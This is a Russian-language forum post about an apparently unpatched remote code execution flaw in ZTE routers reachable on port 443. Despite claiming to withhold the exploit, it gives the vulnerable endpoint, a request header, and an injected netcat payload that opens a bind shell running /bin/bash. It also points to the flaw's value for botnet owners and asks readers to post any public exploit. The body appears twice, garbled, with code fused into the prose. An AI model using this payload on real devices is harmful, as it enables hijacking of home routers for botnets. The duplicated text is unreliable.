Доброго времени суток форумчане. Эта уже третья статья за этот день и за всё время существования меня на форуме.
Я не буду скидывать код эксплойта в целях безопасности, так как ещё не был слит эксплоит, а значит уязвимость ещё существует.
Может найдутся умники и по моим словам смогу создать эксплойт, тогда пожалуйста не выкладывайте его в сеть.
Что такое Remote Code Execution - Удаленное выполнение кода возникает из-за внедренного кода, который интерпретируется и выполняется уязвимым приложением. Причиной данной уязвимости является пользовательский ввод, который приложение использует без надлежащей фильтрации и обработки. В нашем случае уязвимое приложение
Поехали!
Уязвимость заключается в файле
Тип принятия - расшифрования:
Payload:
И когда
Массовые эксплойтеры известны в кругах вирусо-мейкеров.
Так как они часто заражают ioT устройства которые имеют низкоуровневую защиту(стандартная авторизация, старая версия программного обеспечения).
Это означает что эта уязвимость даёт лакомый кусочек владельцам ботнетов. Ведь представьте у вас были бы по контролем все ZTE роутеры с открытым портом 443.
Я не могу назвать его 0day так как возможно нашли уязвимость без меня. Или же уже исправили, но под угрозой стоит около 107,181 ZTE роутеров с портом 443.
Я не нашёл эксплоит или же какой либо информации по данной уязвимости или эксплойту. Если вы нашли эксплоит в публичном доступе то опубликуйте его.
Спасибр за прочтение данной статьи. Я надеюсь вы узнали что такое RCE и какой он бывает.
Я не буду скидывать код эксплойта в целях безопасности, так как ещё не был слит эксплоит, а значит уязвимость ещё существует.
Может найдутся умники и по моим словам смогу создать эксплойт, тогда пожалуйста не выкладывайте его в сеть.
Что такое Remote Code Execution - Удаленное выполнение кода возникает из-за внедренного кода, который интерпретируется и выполняется уязвимым приложением. Причиной данной уязвимости является пользовательский ввод, который приложение использует без надлежащей фильтрации и обработки. В нашем случае уязвимое приложение
/web_shell_cmd.gch
Поехали!
Уязвимость заключается в файле
/web_shell_cmd.gch, когда мы к нему посылаем POST запрос с ошибкой.Тип принятия - расшифрования:
Код:
Accept-Encoding: gzipPayload:
Код:
-1&Cmd=nc+-lvp+4444+-e+/bin/bash&CmdAck=\r\n\r\n"/web_shell_cmd.gch принимает такой запрос он выполняет код так как нету фильтров чтобы найти "вредность" запроса.Массовые эксплойтеры известны в кругах вирусо-мейкеров.
Так как они часто заражают ioT устройства которые имеют низкоуровневую защиту(стандартная авторизация, старая версия программного обеспечения).
Это означает что эта уязвимость даёт лакомый кусочек владельцам ботнетов. Ведь представьте у вас были бы по контролем все ZTE роутеры с открытым портом 443.
Я не могу назвать его 0day так как возможно нашли уязвимость без меня. Или же уже исправили, но под угрозой стоит около 107,181 ZTE роутеров с портом 443.
Я не нашёл эксплоит или же какой либо информации по данной уязвимости или эксплойту. Если вы нашли эксплоит в публичном доступе то опубликуйте его.
Спасибр за прочтение данной статьи. Я надеюсь вы узнали что такое RCE и какой он бывает.
